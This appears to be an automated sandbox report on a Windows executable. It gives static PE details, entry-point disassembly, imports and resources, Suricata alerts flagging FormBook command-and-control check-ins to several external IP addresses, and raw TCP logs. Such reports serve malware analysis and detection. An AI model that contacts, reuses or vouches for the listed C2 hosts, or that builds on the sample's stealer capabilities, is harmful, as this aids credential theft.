                                              SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCduxnPJrGgH3fNoS3eIxnXHW5SkrwA:7JZoQrbTFZY1iaC0xnPJzXfNoS3eIlGZ
                                              TLSH:3A55F222B5C69036C2B323B19EBEF769963D79360336D29737C82D315EA05416B39723
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                              File Icon

                                              Icon Hash:1733312925935517

                                              Static PE Info

                                              General

                                              Entrypoint:0x4165c1
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                              Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:0
                                              File Version Major:5
                                              File Version Minor:0
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:0
                                              Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                              Entrypoint Preview

                                              Instruction
                                              call 00007F89917112EBh
                                              jmp 00007F899170815Eh
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push ebp
                                              mov ebp, esp
                                              push edi
                                              push esi
                                              mov esi, dword ptr [ebp+0Ch]
                                              mov ecx, dword ptr [ebp+10h]
                                              mov edi, dword ptr [ebp+08h]
                                              mov eax, ecx
                                              mov edx, ecx
                                              add eax, esi
                                              cmp edi, esi
                                              jbe 00007F89917082DAh
                                              cmp edi, eax
                                              jc 00007F8991708476h
                                              cmp ecx, 00000080h
                                              jc 00007F89917082EEh
                                              cmp dword ptr [004A9724h], 00000000h
                                              je 00007F89917082E5h
                                              push edi
                                              push esi
                                              and edi, 0Fh
                                              and esi, 0Fh
                                              cmp edi, esi
                                              pop esi
                                              pop edi
                                              jne 00007F89917082D7h
                                              jmp 00007F89917086B2h
                                              test edi, 00000003h
                                              jne 00007F89917082E6h
                                              shr ecx, 02h
                                              and edx, 03h
                                              cmp ecx, 08h
                                              jc 00007F89917082FBh
                                              rep movsd
                                              jmp dword ptr [00416740h+edx*4]
                                              mov eax, edi
                                              mov edx, 00000003h
                                              sub ecx, 04h
                                              jc 00007F89917082DEh
                                              and eax, 03h
                                              add ecx, eax
                                              jmp dword ptr [00416654h+eax*4]
                                              jmp dword ptr [00416750h+ecx*4]
                                              nop
                                              jmp dword ptr [004166D4h+ecx*4]
                                              nop
                                              inc cx
                                              add byte ptr [eax-4BFFBE9Ah], dl
                                              inc cx
                                              add byte ptr [ebx], ah
                                              ror dword ptr [edx-75F877FAh], 1
                                              inc esi
                                              add dword ptr [eax+468A0147h], ecx
                                              add al, cl
                                              jmp 00007F8993B80AD7h
                                              add esi, 03h
                                              add edi, 03h
                                              cmp ecx, 08h
                                              jc 00007F899170829Eh
                                              rep movsd
                                              jmp dword ptr [00000000h+edx*4]

                                              Rich Headers

                                              Programming Language:
                                              • [ C ] VS2010 SP1 build 40219
                                              • [C++] VS2010 SP1 build 40219
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              • [ASM] VS2010 SP1 build 40219
                                              • [RES] VS2010 SP1 build 40219
                                              • [LNK] VS2010 SP1 build 40219

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                              RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                              RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                              RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                              RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                              RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                              RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                              RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                              RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                              RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                              RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                              RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                              RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                              RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                              RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                              RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                              RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                              RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                              RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                              RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                              RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                              RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                              RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                              RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                              RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                              RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                              RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                              Imports

                                              DLLImport
                                              WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                              VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                              COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                              MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                              PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                              USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                              KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                              USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                              GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                              ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                              ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                              OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishGreat Britain
                                              EnglishUnited States

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-09-25T11:36:55.380755+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.752103148.72.152.17480TCP
                                              2024-09-25T11:36:55.380755+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.752103148.72.152.17480TCP
                                              2024-09-25T11:37:16.578015+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7521043.33.130.19080TCP
                                              2024-09-25T11:37:19.136334+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7521053.33.130.19080TCP
                                              2024-09-25T11:37:21.688958+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7521063.33.130.19080TCP
                                              2024-09-25T11:37:24.230696+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.7521073.33.130.19080TCP
                                              2024-09-25T11:37:24.230696+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.7521073.33.130.19080TCP
                                              2024-09-25T11:37:30.189995+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.752108172.191.244.6280TCP
                                              2024-09-25T11:37:32.652322+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.752109172.191.244.6280TCP
                                              2024-09-25T11:37:35.207083+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.752110172.191.244.6280TCP
                                              2024-09-25T11:37:37.743830+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.752111172.191.244.6280TCP
                                              2024-09-25T11:37:37.743830+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.752111172.191.244.6280TCP
                                              2024-09-25T11:37:44.123012+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.752112172.96.191.3980TCP
                                              2024-09-25T11:37:46.664263+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.752113172.96.191.3980TCP
                                              2024-09-25T11:37:49.179941+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.752114172.96.191.3980TCP
                                              2024-09-25T11:37:51.714838+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.752115172.96.191.3980TCP
                                              2024-09-25T11:37:51.714838+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.752115172.96.191.3980TCP
                                              2024-09-25T11:37:57.561999+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.752116217.70.184.5080TCP
                                              2024-09-25T11:38:00.099887+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.752117217.70.184.5080TCP
                                              2024-09-25T11:38:02.652253+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.752118217.70.184.5080TCP
                                              2024-09-25T11:38:05.211275+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.752119217.70.184.5080TCP
                                              2024-09-25T11:38:05.211275+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.752119217.70.184.5080TCP
                                              2024-09-25T11:38:11.586095+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75212063.250.47.4080TCP
                                              2024-09-25T11:38:14.149666+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75212163.250.47.4080TCP
                                              2024-09-25T11:38:16.688710+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75212263.250.47.4080TCP
                                              2024-09-25T11:38:19.232099+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.75212363.250.47.4080TCP
                                              2024-09-25T11:38:19.232099+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.75212363.250.47.4080TCP
                                              2024-09-25T11:38:24.904088+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75212491.184.0.20080TCP
                                              2024-09-25T11:38:27.458436+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75212591.184.0.20080TCP
                                              2024-09-25T11:38:30.000561+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75212691.184.0.20080TCP
                                              2024-09-25T11:38:32.552612+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.75212791.184.0.20080TCP
                                              2024-09-25T11:38:32.552612+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.75212791.184.0.20080TCP
                                              2024-09-25T11:38:38.365794+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75212813.248.169.4880TCP
                                              2024-09-25T11:38:40.949790+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75212913.248.169.4880TCP
                                              2024-09-25T11:38:43.527376+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75213013.248.169.4880TCP
                                              2024-09-25T11:38:46.060671+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.75213113.248.169.4880TCP
                                              2024-09-25T11:38:46.060671+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.75213113.248.169.4880TCP
                                              2024-09-25T11:39:06.101770+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75213643.242.202.16980TCP
                                              2024-09-25T11:39:08.656855+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75213743.242.202.16980TCP
                                              2024-09-25T11:39:11.202053+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75213843.242.202.16980TCP
                                              2024-09-25T11:39:13.754391+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.75213943.242.202.16980TCP
                                              2024-09-25T11:39:13.754391+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.75213943.242.202.16980TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 25, 2024 11:36:54.870913982 CEST5210380192.168.2.7148.72.152.174
                                              Sep 25, 2024 11:36:54.875866890 CEST8052103148.72.152.174192.168.2.7
                                              Sep 25, 2024 11:36:54.875978947 CEST5210380192.168.2.7148.72.152.174
                                              Sep 25, 2024 11:36:54.884459972 CEST5210380192.168.2.7148.72.152.174
                                              Sep 25, 2024 11:36:54.889302015 CEST8052103148.72.152.174192.168.2.7
                                              Sep 25, 2024 11:36:55.380481958 CEST8052103148.72.152.174192.168.2.7
                                              Sep 25, 2024 11:36:55.380502939 CEST8052103148.72.152.174192.168.2.7
                                              Sep 25, 2024 11:36:55.380754948 CEST5210380192.168.2.7148.72.152.174
                                              Sep 25, 2024 11:36:55.384526014 CEST5210380192.168.2.7148.72.152.174
                                              Sep 25, 2024 11:36:55.389400005 CEST8052103148.72.152.174192.168.2.7
                                              Sep 25, 2024 11:37:16.116061926 CEST5210480192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:16.122270107 CEST80521043.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:16.122358084 CEST5210480192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:16.133428097 CEST5210480192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:16.138236046 CEST80521043.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:16.577930927 CEST80521043.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:16.578015089 CEST5210480192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:17.636187077 CEST5210480192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:17.719436884 CEST80521043.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:18.654828072 CEST5210580192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:18.659657955 CEST80521053.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:18.659785032 CEST5210580192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:18.671310902 CEST5210580192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:18.676173925 CEST80521053.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:19.136231899 CEST80521053.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:19.136333942 CEST5210580192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:20.183058023 CEST5210580192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:20.188035965 CEST80521053.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:21.201698065 CEST5210680192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:21.206981897 CEST80521063.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:21.207082987 CEST5210680192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:21.218815088 CEST5210680192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:21.223689079 CEST80521063.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:21.223712921 CEST80521063.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:21.688884974 CEST80521063.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:21.688957930 CEST5210680192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:22.730051041 CEST5210680192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:22.739134073 CEST80521063.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:23.748820066 CEST5210780192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:23.753964901 CEST80521073.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:23.754112005 CEST5210780192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:23.761811018 CEST5210780192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:23.766891003 CEST80521073.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:24.230459929 CEST80521073.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:24.230525970 CEST80521073.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:24.230695963 CEST5210780192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:24.233376026 CEST5210780192.168.2.73.33.130.190
                                              Sep 25, 2024 11:37:24.238209009 CEST80521073.33.130.190192.168.2.7
                                              Sep 25, 2024 11:37:29.642652035 CEST5210880192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:29.647540092 CEST8052108172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:29.647653103 CEST5210880192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:29.659002066 CEST5210880192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:29.668083906 CEST8052108172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:30.189925909 CEST8052108172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:30.189943075 CEST8052108172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:30.189966917 CEST8052108172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:30.189995050 CEST5210880192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:30.190026045 CEST5210880192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:31.167465925 CEST5210880192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:32.186121941 CEST5210980192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:32.191018105 CEST8052109172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:32.191138983 CEST5210980192.168.2.7172.191.244.62
